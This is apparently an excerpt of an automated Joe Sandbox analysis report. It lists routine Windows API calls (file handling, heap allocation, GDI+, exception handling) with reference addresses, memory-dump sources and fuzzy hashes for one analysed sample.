                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0036B1EA,?,00000000), ref: 0036B3C4
                                    • GetCPInfo.KERNEL32(00000000,0036B1EA,?,?,?,0036B1EA,?,00000000), ref: 0036B3D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID:
                                    • API String ID: 546120528-0
                                    • Opcode ID: 616f29819e3d10df5468010b0dafc3f5e114292d58bfc7155ded8906de038e63
                                    • Instruction ID: 61674c07664ab3956d9fd290841a08ed48caf1c788c1a39a2a79e952e1b580c3
                                    • Opcode Fuzzy Hash: 616f29819e3d10df5468010b0dafc3f5e114292d58bfc7155ded8906de038e63
                                    • Instruction Fuzzy Hash: 455124709002059EDB239F36C8816BAFBE9EF45310F18C4AED096CB257DB359986CF91
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00352DA4
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00352DBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID:
                                    • API String ID: 2005118841-0
                                    • Opcode ID: e4fd7110e9b1170639354c3b77891b66ac7df074072dbbf0d15452a3df054ab5
                                    • Instruction ID: 9ad9271319505fec1fc0734192b5e2d9707c7dcc91e65a9e7d34bcbe47e0d917
                                    • Opcode Fuzzy Hash: e4fd7110e9b1170639354c3b77891b66ac7df074072dbbf0d15452a3df054ab5
                                    • Instruction Fuzzy Hash: C94114B0A087416BD72EEA74D484F9AF7E4BF92305F04052AEE6947162C774A84CC795
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00346057: __EH_prolog.LIBCMT ref: 0034605C
                                      • Part of subcall function 0034C827: __EH_prolog.LIBCMT ref: 0034C82C
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C86F
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C893
                                    • new.LIBCMT ref: 003413FE
                                      • Part of subcall function 0034B07D: __EH_prolog.LIBCMT ref: 0034B082
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: ee3b51ea0f3b51f2ae8b4ddb0e676dcb86ad32d63f9b95e3ce69986ce97f4fc9
                                    • Instruction ID: a5a7895880dc5a7b301e6057475050de07d04297f9716acd82c35e510d23f0ec
                                    • Opcode Fuzzy Hash: ee3b51ea0f3b51f2ae8b4ddb0e676dcb86ad32d63f9b95e3ce69986ce97f4fc9
                                    • Instruction Fuzzy Hash: F94136B0805B409EE726DF7984859E7FBE5FF18310F404A6ED6EE8B282CB326554CB11
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00346057: __EH_prolog.LIBCMT ref: 0034605C
                                      • Part of subcall function 0034C827: __EH_prolog.LIBCMT ref: 0034C82C
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C86F
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C893
                                    • new.LIBCMT ref: 003413FE
                                      • Part of subcall function 0034B07D: __EH_prolog.LIBCMT ref: 0034B082
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: b3ccb5d11b75d756da2080d8f410e5325f34b93e87dad08b7dac05a9357e3bdf
                                    • Instruction ID: 7011cf56f2935a2e643ba01fe6476789ae7fdaa304e28821cc525221c59acf9b
                                    • Opcode Fuzzy Hash: b3ccb5d11b75d756da2080d8f410e5325f34b93e87dad08b7dac05a9357e3bdf
                                    • Instruction Fuzzy Hash: 2C4144B0805B409EE726DF798485AE7FBE5FF19310F404A6ED5EE8B282CB326554CB11
                                    APIs
                                    • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00349EDC,?,?,00347867), ref: 003497A6
                                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00349EDC,?,?,00347867), ref: 003497DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 95b66d6a38ec191d46d27162af8a9e0385854846eb8e381d8286d872c91c0961
                                    • Instruction ID: 8e7d36aaaaec2798ae96b0713e0663e8a0e6ed97e4ea66f86580794805ef1290
                                    • Opcode Fuzzy Hash: 95b66d6a38ec191d46d27162af8a9e0385854846eb8e381d8286d872c91c0961
                                    • Instruction Fuzzy Hash: 3721E4B1114748AEE7318F64C885BA7BBECEB49764F00492EF5E58A191C374BC889B61
                                    APIs
                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00347547,?,?,?,?), ref: 00349D7C
                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00349E2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File$BuffersFlushTime
                                    • String ID:
                                    • API String ID: 1392018926-0
                                    • Opcode ID: 2afb7ca4883b2d0f26d7664169f4907a9bd9ee44ad598db598410411e0d5d0be
                                    • Instruction ID: 983435e31bd89519f936a35d7151d3ba8039cf4ffb87a2a47e4a056241f4d7c5
                                    • Opcode Fuzzy Hash: 2afb7ca4883b2d0f26d7664169f4907a9bd9ee44ad598db598410411e0d5d0be
                                    • Instruction Fuzzy Hash: 5F21F632548246AFC716DF24C491FABBBE8AF92304F05085EB8D18B151D329EA0CDB51
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,00373958), ref: 0036A4B8
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0036A4C5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: 30b7d1f37b2fe1783d103daf6c16b1b44f969c609475bb878e4e5f32412cad1c
                                    • Instruction ID: eb0faea121c0eb6ada93c24f0e2c5f47965ec0e41d908c4763147281c3dfe50b
                                    • Opcode Fuzzy Hash: 30b7d1f37b2fe1783d103daf6c16b1b44f969c609475bb878e4e5f32412cad1c
                                    • Instruction Fuzzy Hash: CB110D336019209B9B379E2AEC4495A73999B85760B17C150FD15FF35CDE70DC41CAD1
                                    APIs
                                    • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00349B35,?,?,00000000,?,?,00348D9C,?), ref: 00349BC0
                                    • GetLastError.KERNEL32 ref: 00349BCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer
                                    • String ID:
                                    • API String ID: 2976181284-0
                                    • Opcode ID: 1515018dd1d605eb1e6e8ec04bdc13364a96d589b46452a8f719bd2fc15494f2
                                    • Instruction ID: 5a2ab910a8224e2479bd40570d0015c72bf369638ab222db0a3d7f32b5dcd335
                                    • Opcode Fuzzy Hash: 1515018dd1d605eb1e6e8ec04bdc13364a96d589b46452a8f719bd2fc15494f2
                                    • Instruction Fuzzy Hash: 090104313042159F8B1ACE65AC84B7FB7DDEFC0321B10462FF8168F280CA30F805AA21
                                    APIs
                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00349E76
                                    • GetLastError.KERNEL32 ref: 00349E82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer
                                    • String ID:
                                    • API String ID: 2976181284-0
                                    • Opcode ID: 95d7e049ce39be3bbec0da403971457ee1bf32a811d7b24553b847992ca18197
                                    • Instruction ID: 13374fe5c7dfd6e1cc1735850b66f7f6a0ea61097eb6f6e86ef808d0e5b754ad
                                    • Opcode Fuzzy Hash: 95d7e049ce39be3bbec0da403971457ee1bf32a811d7b24553b847992ca18197
                                    • Instruction Fuzzy Hash: BF01DE713002005BEB36DE29CC48B6BB6DDDB88314F11493EB186CA680CA30FC8C8B11
                                    APIs
                                    • _free.LIBCMT ref: 00368627
                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00380F50,0034CE57,?,?,?,?,?,?), ref: 00368663
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Heap$AllocAllocate_free
                                    • String ID:
                                    • API String ID: 2447670028-0
                                    • Opcode ID: 902150aa2d054cb8a5ababa6a9c9575956db942f9846d440bbde936127139164
                                    • Instruction ID: 1eb6328d6d474d1a88a0a5bfb38aadd2f10636f07c61d0b026c33ba0fae85195
                                    • Opcode Fuzzy Hash: 902150aa2d054cb8a5ababa6a9c9575956db942f9846d440bbde936127139164
                                    • Instruction Fuzzy Hash: 9CF0F63110111566CB332B25EC00F6F3B5C9FDA7B0F26C315FA549A19DDF70C80155A5
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00350915
                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 0035091C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Process$AffinityCurrentMask
                                    • String ID:
                                    • API String ID: 1231390398-0
                                    • Opcode ID: e48c96e8f1a501b0e602fa7b57a0b9ca4b03f903d16a1184d8b22bf13ae8fefb
                                    • Instruction ID: 5de0abcecf541277895341ce31b4d93a50d26c564b3e79f5bd82846286d1791b
                                    • Opcode Fuzzy Hash: e48c96e8f1a501b0e602fa7b57a0b9ca4b03f903d16a1184d8b22bf13ae8fefb
                                    • Instruction Fuzzy Hash: 83E09B72A1010AAB6F1FCAB49C04CFB739DEB043167114179EC4BD3125F731DD058660
                                    APIs
                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A458
                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A489
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 38c595d5c8e05ef221c1a6d8b31c2f7623893c85455fafa14e12296c9dc7b608
                                    • Instruction ID: 41bcaa7d3f8df4d7dbd428f074f28fd3c650d1786ca014290f28e2050baa87cf
                                    • Opcode Fuzzy Hash: 38c595d5c8e05ef221c1a6d8b31c2f7623893c85455fafa14e12296c9dc7b608
                                    • Instruction Fuzzy Hash: CDF0A03128420D7BDF135F60DC05FD977ACBF04381F048051BC8C8A261DB76DAA8AE50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemText_swprintf
                                    • String ID:
                                    • API String ID: 3011073432-0
                                    • Opcode ID: 0e52c67092c63825849f92e0b6d73b1a9c8d79bd2c0594e2768ea277b812df85
                                    • Instruction ID: bf5f2bf393643abcaeb860d4c316d447d7b6bb1775bffca6de10d402c7f91d7a
                                    • Opcode Fuzzy Hash: 0e52c67092c63825849f92e0b6d73b1a9c8d79bd2c0594e2768ea277b812df85
                                    • Instruction Fuzzy Hash: 2BF0EC7250034C7ADB23AB709C06F9A379C9B05747F0409D5BB009B0B2DE716A644761
                                    APIs
                                    • DeleteFileW.KERNELBASE(?,?,?,0034984C,?,?,00349688,?,?,?,?,00371FA1,000000FF), ref: 0034A13E
                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0034984C,?,?,00349688,?,?,?,?,00371FA1,000000FF), ref: 0034A16C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    APIs
                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00371FA1,000000FF), ref: 0035A3D1
                                    • CoUninitialize.COMBASE(?,?,?,?,00371FA1,000000FF), ref: 0035A3D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: GdiplusShutdownUninitialize
                                    • String ID:
                                    • API String ID: 3856339756-0
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,?,?,0034A189,?,003476B2,?,?,?,?), ref: 0034A1A5
                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0034A189,?,003476B2,?,?,?,?), ref: 0034A1D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DirectoryLibraryLoadSystem
                                    • String ID:
                                    • API String ID: 1175261203-0
                                    APIs
                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00359B30
                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00359B37
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: BitmapCreateFromGdipStream
                                    • String ID:
                                    • API String ID: 1918208029-0
                                    APIs
                                      • Part of subcall function 0036329A: try_get_function.LIBVCRUNTIME ref: 003632AF
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0036217A
                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00362185
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                    • String ID:
                                    • API String ID: 806969131-0
                                    APIs
                                    • DloadLock.DELAYIMP ref: 0035DC73
                                    • DloadProtectSection.DELAYIMP ref: 0035DC8F
                                      • Part of subcall function 0035DE67: DloadObtainSection.DELAYIMP ref: 0035DE77
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Dload$Section$LockObtainProtect
                                    • String ID:
                                    • API String ID: 731663317-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemShowWindow
                                    • String ID:
                                    • API String ID: 3351165006-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00348384
                                      • Part of subcall function 00341380: __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00341380: new.LIBCMT ref: 003413FE
                                      • Part of subcall function 003419A6: __EH_prolog.LIBCMT ref: 003419AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00341E05
                                      • Part of subcall function 00343B3D: __EH_prolog.LIBCMT ref: 00343B42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0035A7C8
                                      • Part of subcall function 00341380: __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00341380: new.LIBCMT ref: 003413FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    APIs
                                    Memory Dump Source
